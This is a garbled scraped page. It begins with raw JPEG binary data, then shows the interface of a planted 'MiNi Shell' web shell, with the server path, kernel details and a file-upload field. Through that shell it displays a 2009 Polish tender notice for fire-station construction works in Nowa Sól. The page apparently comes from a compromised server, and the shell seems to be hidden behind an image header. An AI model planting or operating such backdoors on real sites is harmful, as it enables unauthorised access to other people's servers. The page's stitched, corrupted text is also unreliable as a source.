JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091020/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20091020/366856-N-2009.html

<p class="kh_header"><b>Nowa Sól: Budowa Strażnicy Komendy Powiatowej Państwowej Straży Pożarnej 
i Jednostki Ratowniczo Gaśniczej  przy ul. Staszica w Nowej Soli - etap III 
(roboty ziemne z wywózką urobku i gruzu, podkłady pod posadzki, izolacje przeciwwilgociowe, przyłącze wodno-kanalizacyjne, kanalizacja podposadzkowa ze studzienkami oraz separatorem oleju w części warsztatowo-garażowej - wg ustalonego zakresu)</b><br>
<b>Numer ogłoszenia: 366856 - 2009; data zamieszczenia: 20.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Powiatowa Państwowej Straży Pożarnej w Nowej Soli , ul.gen.S.Grota-Roweckiego 11, 67-100 Nowa Sól, woj. lubuskie, tel. 068 4557703, faks 068 4557705.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.strazns.webd.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa Strażnicy Komendy Powiatowej Państwowej Straży Pożarnej 
i Jednostki Ratowniczo Gaśniczej  przy ul. Staszica w Nowej Soli - etap III 
(roboty ziemne z wywózką urobku i gruzu, podkłady pod posadzki, izolacje przeciwwilgociowe, przyłącze wodno-kanalizacyjne, kanalizacja podposadzkowa ze studzienkami oraz separatorem oleju w części warsztatowo-garażowej - wg ustalonego zakresu).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wartość zamówienia nie jest równa i nie przekracza kwoty określonej na podstawie przepisu art.11 ust.8 ustawy Prawo zamówień publicznych.
Przedmiotem zamówienia jest budowa Strażnicy Komendy Powiatowej Państwowej Straży Pożarnej i Jednostki Ratowniczo-Gaśniczej - III etap w zakresie obejmującym:
1)wykonanie przyłącza wodnego z rur PH 90 zakończonego dwoma licznikami pomiarowymi - od przyłącza wodnego budynku Powiatowego Centrum Edukacji do budynku strażnicy - ok. 124 m,
2)wykonanie przyłącza hydrantowego z rur PH 90 zakończonego zasuwą i hydrantem nadziemnym - z budynku strażnicy na plac wewnętrzny - ok. 18 m,
3)wykonanie kanalizacji podposadzkowej garażu i warsztatu z rur PCV 110 do wysokości podkładów sypkich pod posadzki - ok. 38 m,
4)wykonanie kanalizacji podposadzkowej garażu i warsztatu z rur PCV 160 do wysokości podkładów sypkich pod posadzki, (z wpięciem kanalizacji ściekowej do studzienki S3 oraz kanalizacji technicznej do studzienki St1, dalej separatora oleju i studzienki S1) - ok. 131m,
5)montaż studzienek (D 1000) S1 i St1- 2szt.,
6)ułożenie i montaż separatora olejowego D1800 - 1 szt.,
7)wykonanie kanalizacji ściekowej od studzienki S2 (poprzez studzienkę S1) do przepompowni ścieków z rur PCV 200  - ok. 38 m,
8)wybranie z wnętrza części garażowo-warsztatowej urobku i złożeniem go we wskazanym miejscu  na placu budowy- ok. 364 m3,
9)wykonanie podkładów pod podsadzki (z ubitych materiałów sypkich) w części garażowo-warsztatowej  - ok. 208 m3,
10)wykonanie izolacji przeciwwilgociowych powłokowych na zimno - ok. 80 m2,
11)wywóz z placu budowy ziemi i gruzu ok. 112 m3.
Szczegółowe wyszczególnienie prac objętych III etapem zawiera Przedmiar robót- załącznik nr  2 do SIWZ, a szczegółowy ich opis Dokumentacja Projektowa oraz Specyfikacja Techniczna  Wykonania i Odbioru Robót.
Wykonawca przed złożeniem oferty ma obowiązek zapoznać się z dokumentacją projektową i dokonać wizji lokalnej terenu, który ma być objęty przedmiotem zamówienia oraz zebrania na swoją odpowiedzialność, koszt i ryzyko, wszelkich informacji mogących okazać się za niezbędne do przygotowania oferty i podpisania umowy.
Ilekroć w Dokumentacji Projektowej, zostały wskazane znaki towarowe, patenty lub pochodzenie (producent) urządzeń i materiałów, Zamawiający dopuszcza oferowanie urządzeń i materiałów równoważnych wyłącznie w takim samym zakresie i w taki sposób, które:
1)gwarantują wykonanie robót w zgodzie z wydanymi pozwoleniami na budowę,
2)zapewniają wbudowanie, zamontowanie - urządzeń i materiałów o parametrach technicznych i jakościowych nie gorszych od zaprojektowanych pierwotnie, a wynikające z tego wszelkie zmiany Dokumentacji Projektowej, czy pozwoleń, Wykonawca dokona na koszt własny.
Wymagany przez Zamawiającego minimalny okres gwarancji dla przedmiotu zamówienia: 36 miesięcy.
Wykonawca zobowiązany będzie przy wykonywaniu robót, przemieszczaniu materiałów i sprzętu do zabezpieczenia terenu przed ewentualnymi kolizjami (teren obiektu Powiatowego Centrum Edukacji)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1, 45.21.61.21-8, 45.23.13.00-8, 45.33.20.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Wniesieni i zwrot wadium.
1.1.Wadium w wysokości: 3.500,00zł (słownie: trzy tysiące pięćset złotych 00/100), może być wnoszone w jednej lub kilku formach:
a)pieniądzu,
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)gwarancjach bankowych,
d)gwarancjach ubezpieczeniowych,
e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
1.2.Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego BGŻ o/Nowa Sól nr 29203000451110000000283890.  Dokument przelewu należy opisać: Wadium - Budowa Strażnicy KP i JRG PSP Nowa Sól - etap III, nr sprawy  POT.2370-4/09.
1.3.Kopię przelewu należy załączyć do oferty.
1.4.Wadium w:
1)poręczeniach lub gwarancjach bankowych,
2)gwarancjach ubezpieczeniowych,
3)poręczeniach,
należy złożyć w siedzibie Zamawiającego, I piętro - pokój nr 11 - w godzinach pracy Komendy. Wykonawca otrzyma pokwitowanie złożenia wadium. Kopię dokumentu wadium należy załączyć do oferty.
1.5.Poręczenia instytucji kredytowych i gwarancje ubezpieczeniowe obejmować winny czas związania Wykonawcy ofertą oraz zawierać informacje dotyczące utraty wadium zgodnie z art. 46. ust.4a i ust. 5 Ustawy - Prawo zamówień publicznych.
1.6.Termin wniesienia wadium - do dnia 11 listopada 2009 r. do godz. 9.00.
1.7.Zgodnie z art. 24 ust. 2 pkt 4 Wykonawcę, który nie wniósł wadium do dnia 11 listopada 2009r. do godz. 9.00 wyklucza się z postępowania.
1.8.Wadium wnoszone w pieniądzu uznane będzie za wniesione w terminie tylko w przypadku wpłynięcia na konto Zamawiającego przed upływem terminu.
1.9.Zgodnie z postanowieniami art. 46 Ustawy - Prawo zamówień publicznych, Zamawiający dokonuje  zwrotu wadium w niżej wymienionych przypadkach:
1)niezwłocznie, jeżeli:
c)upłynął termin związania ofertą,
d)zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy,
e)zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia,
2)na pisemny wniosek Wykonawcy jeżeli:
a)wycofał ofertę przed upływem terminu składania ofert,
b)który został wykluczony z postępowania,
c)którego oferta została odrzucona.
1.10.Zamawiający żąda ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium na podstawie ust. 1.9 pkt  2 lit. b - c, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia Wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego.
1.11.Wadium wniesione w pieniądzu, Zamawiający zwróci wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy.
1.12.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy - prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
1.13.Zgodnie z art. 46. ust. 5 Ustawy - Prawo zamówień publicznych, utracić wadium na rzecz Zamawiającego może Wykonawca, którego oferta została wybrana, jeżeli:
1)odmówi podpisania umowy na warunkach określonych w ofercie,
2)nie wniósł zabezpieczenia należytego wykonania umowy,
3)zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy zgodnie z wymogiem art. 22 ust. 1 ustawy:
1)Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień tj.:
a)prowadzą działalność gospodarczą w zakresie objętym przedmiotem zamówienia;
b)nie zalegają z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne;
2)Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj.:
a)Wykonawca musi wykazać, że w okresie 5 ostatnich lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonaniem robót budowlanych odpowiadającym swoim rodzajem robotom budowlanym stanowiącym przedmiot zmówienia z podaniem ich wartości oraz daty i miejsca wykonania, w tym - co najmniej realizacją 2 zamówień na robót budowlanych o podobnym charakterze jak przedmiot zamówienia o minimalnej wartości 200 000,00 zł brutto każdy - potwierdzone dokumentami o należytym wykonaniu. Za roboty budowlane wykonane uznaje się roboty zakończone i odebrane protokołem odbioru robót.
b)dysponują lub będą dysponować pracownikami posiadającymi uprawnienia i kwalifikacje do wykonywania zamówienia, tj.: 
- kierownikiem budowy posiadającym uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności budowlano - konstrukcyjnej i przynależącym do właściwej Izby Inżynierów Budownictwa  oraz 
- kierownikiem robót budowlanych posiadającym uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie wewnętrznych i zewnętrznych sieci wodno-kanalizacyjnych i przynależącym do właściwej Izby Inżynierów Budownictwa.
3)Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj.:
a)jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.  
4)Nie podlega wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ustawy.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia tj. konsorcjum, wymaga się aby przynajmniej jeden z Wykonawców (lub wspólnie) spełniał wymagania, o których mowa w pkt 1 - 3. 
W przypadku konsorcjum, żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy.
Ocena spełnienia warunków udziału Wykonawcy w postępowaniu zostanie dokonana według reguły spełnia - nie spełnia, na podstawie oceny formalno- prawnej złożonych oświadczeń i dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Na potwierdzenie spełniania warunków udziału w postępowaniu Wykonawca obowiązany jest dołączyć do oferty następujące dokumenty i oświadczenia:
1)Oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie ze wzorem oświadczenia, stanowiącego załącznik nr 1 do SIWZ;
2)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
3)Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
4)Wykaz wykonanych robót w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, potwierdzających spełnienie warunku udziału w postępowaniu z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie - załącznik nr 3 do SIWZ.
5)Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych  niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności zgodnie ze wzorem stanowiącym - załącznik nr 4 do SIWZ oraz  dokumenty potwierdzające uprawnienia budowlane wykazanych w nim osób (zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. Nr 83 poz.578 z późn. zm.) lub innych wcześniej obowiązujących przepisów) wraz z aktualnymi na dzień otwarcia ofert zaświadczeniami o przynależności do właściwej Izby Samorządu Zawodowego;
6)Polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności;
2.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów wymienionych powyżej w ust. 1 pkt 2 - 3, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: nie otwarto jego likwidacji ani nie ogłoszono upadłości, nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
3.W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), dokumenty wymienione powyżej w ust.1 pkt 2-3 składa każdy z Wykonawców oddzielnie. Dokumenty wskazane w ust.1 pkt 4 - 6 mogą zostać złożone przez jednego z Wykonawców albo wspólnie. Oświadczenie, o którym mowa w ust. 1 pkt 1 składane jest wspólnie przez Wykonawców.
4.W przypadku konsorcjum do oferty musi być załączony dokument ustanawiający pełnomocnika konsorcjum do reprezentowania go w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
5.Z treści załączonych do oferty oświadczeń i dokumentów musi wynikać jednoznacznie, iż warunki udziału w niniejszym postepowaniu zostały przez Wykonawcę spełnione.
6.Dokumenty, o których mowa w ust.1 pkt 2-3 i 6 należy przedstawić w formie oryginału lub kopii poświadczonych za zgodność z oryginałem przez osobę/osoby uprawnioną/e do reprezentacji Wykonawcy.
7.Na kompletną ofertę składają się:
1)Formularza ofertowy- wypełniony i podpisany formularz oferty zgodny ze wzorem stanowiącym załącznik nr 5 do SIWZ;
2)Formularz istotnych postanowień umowy - podpisany formularz zgodny ze wzorem stanowiącym załącznik nr 6 do SIWZ;
3)Oświadczenie o podwykonawcach - wypełniony i podpisany formularz oferty zgodny ze wzorem - stanowiącym załącznik nr 7 do SIWZ;
4)Dowód wniesienia  wadium - zgodnie z wymaganiami określonym w ogłoszeniu i Rozdziale 7 SIWZ;
5)Wszystkie dokumenty i oświadczenia, których przedstawienia żąda Zamawiający w celu potwierdzenia warunków udziału w postępowaniu zgodnie z ust. 1 pkt. 1-6 oraz postanowieniami Rozdziału 6 SIWZ;
6)Pełnomocnictwo do podpisania oferty - o ile umocowanie do dokonania przedmiotowej czynności nie wynika z dokumentów rejestrowych załączonych do oferty;
7)Pełnomocnictwo do reprezentacji konsorcjum - w przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia do oferty dołączone powinno być pełnomocnictwo w oryginale lub kopii potwierdzonej za zgodność z oryginałem przez notariusza..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.strazns.webd.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba zamawiającego, 67-100 Nowa Sól, ul.gen. S.Grota-Roweckiego 11, pok.nr 3.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.11.2009 godzina 09:00, miejsce: Komenda Powiatowa Państwowej Straży Pożarnej w Nowej Soli
ul. gen. S Grota- Roweckiego 11, 67-100 Nowa Sól,
Sekretariat- I piętro - pok.11..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com